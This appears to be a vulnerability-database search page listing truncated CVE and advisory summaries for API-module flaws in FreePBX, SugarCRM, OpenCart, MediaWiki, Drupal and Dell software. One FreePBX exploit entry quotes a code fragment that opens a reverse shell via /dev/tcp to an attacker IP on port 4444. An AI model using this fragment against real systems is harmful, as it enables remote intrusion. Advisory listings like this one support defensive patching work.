PT-2025-36101

Name of the Vulnerable Software and Affected Versions: FreePBX versions prior to 15.0.13 FreePBX versions 16.0.2 through 16.0.14 FreePBX versions 17.0.1 and 17.0.2 Description: The api module for FreePBX, an open-source GUI for Asterisk, is susceptible to an issue where a shared OAuth private key...

CVE-2025-7672

The improper default setting in JiranSoft CrossEditor4 on Windows, Linux, Unix API modules potentaily allows Stored XSS. This issue affects CrossEditor4: from 4.0.0.01 before 4.6.0.23...

CVE-2024-58258

SugarCRM before 13.0.4 and 14.x before 14.0.1 allows SSRF in the API module because a limited type of code injection can occur...

CVE-2024-58258

SugarCRM before 13.0.4 and 14.x before 14.0.1 allows SSRF in the API module because a limited type of code injection can occur...

CVE-2024-58258

SugarCRM has a code injection flaw (CVE-2024-58258) in versions before 13.0.4 and 14.x before 14.0.1. The vulnerability arises from improper sanitization of user-supplied GET parameters in the /css/preview API, which is parsed as LESS and can be abused via @import to trigger SSRF and local file d...

CVE-2024-58258

SugarCRM before 13.0.4 and 14.x before 14.0.1 allows SSRF in the API module because a limited type of code injection can occur...

CVE-2024-58258

SugarCRM before 13.0.4 and 14.x before 14.0.1 allows SSRF in the API module because a limited type of code injection can occur...

PT-2025-29387 · Sugarcrm · Sugarcrm

Name of the Vulnerable Software and Affected Versions: SugarCRM versions prior to 13.0.4 SugarCRM versions 14.x prior to 14.0.1 Description: The software contains a Server-Side Request Forgery SSRF issue in the API module due to a limited type of code injection. Recommendations: Update to SugarCR...

CVE-2025-0580

A vulnerability was found in Shiprocket Module 3 on OpenCart. It has been rated as critical. Affected by this issue is some unknown functionality of the file /index.php?route=extension/module/restapi=getOrders of the component REST API Module. The manipulation of the argument contentHash leads to...

CVE-2021-36129

An issue was discovered in the Translate extension in MediaWiki through 1.36. The Aggregategroups Action API module does not validate the parameter for aggregategroup when action=remove is set, thus allowing users with the translate-manage right to silently delete various groups' metadata...

CVE-2015-2197

Cross-site scripting XSS vulnerability in the Entity API module before 7.x-1.6 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via a field label in the Token API...

CVE-2025-0579

A vulnerability was found in Shiprocket Module 3/4 on OpenCart. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /index.php?route=extension/shiprocket/module/restapi of the component REST API Module. The manipulation of the argument x-userna...

CVE-2025-0579

CVE-2025-0579 affects Shiprocket Module 3/4 on OpenCart, specifically the REST API Module’s restapi endpoint. The root cause is manipulation of the x-username parameter, leading to SQL injection that can be exploited remotely. Public exploitation has been disclosed. Affected versions are Shiprock...

PT-2025-3970 · Opencart +1 · Opencart +1

Name of the Vulnerable Software and Affected Versions: Shiprocket Module 3/4 on OpenCart affected versions not specified Description: A critical issue has been found in the Shiprocket Module 3/4 on OpenCart, affecting an unknown functionality of the file...

MediaWiki suffers from an unspecified vulnerability (CNVD-2024-31368)

MediaWiki is a suite of free and freely available web-based Wiki engines from the MediaWiki Foundation. It can be used to deploy in-house knowledge management and content management systems. MediaWiki suffers from a security vulnerability that stems from possible cross-site request forgery CSRF i...

MediaWiki 安全漏洞

MediaWiki is a suite of free and freely available web-based Wiki engines from the MediaWiki Foundation. It can be used to deploy in-house knowledge management and content management systems. MediaWiki suffers from a security vulnerability that stems from possible cross-site request forgery CSRF i...

FreePBX 16 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...

CVE-2024-28976

Dell Repository Manager, versions prior to 3.4.5, contains a Path Traversal vulnerability in API module. A local attacker with low privileges could potentially exploit this vulnerability to gain unauthorized write access to the files stored on the server filesystem with the privileges of the...

CVE-2024-28976

Dell Repository Manager, versions prior to 3.4.5, contains a Path Traversal vulnerability in API module. A local attacker with low privileges could potentially exploit this vulnerability to gain unauthorized write access to the files stored on the server filesystem with the privileges of the...

CVE-2024-28976

Dell Repository Manager is affected by a Path Traversal vulnerability in the API module, impacting versions prior to 3.4.5. The root cause is path traversal that could allow a local attacker with low privileges to gain unauthorized write access to files on the server filesystem with the web appli...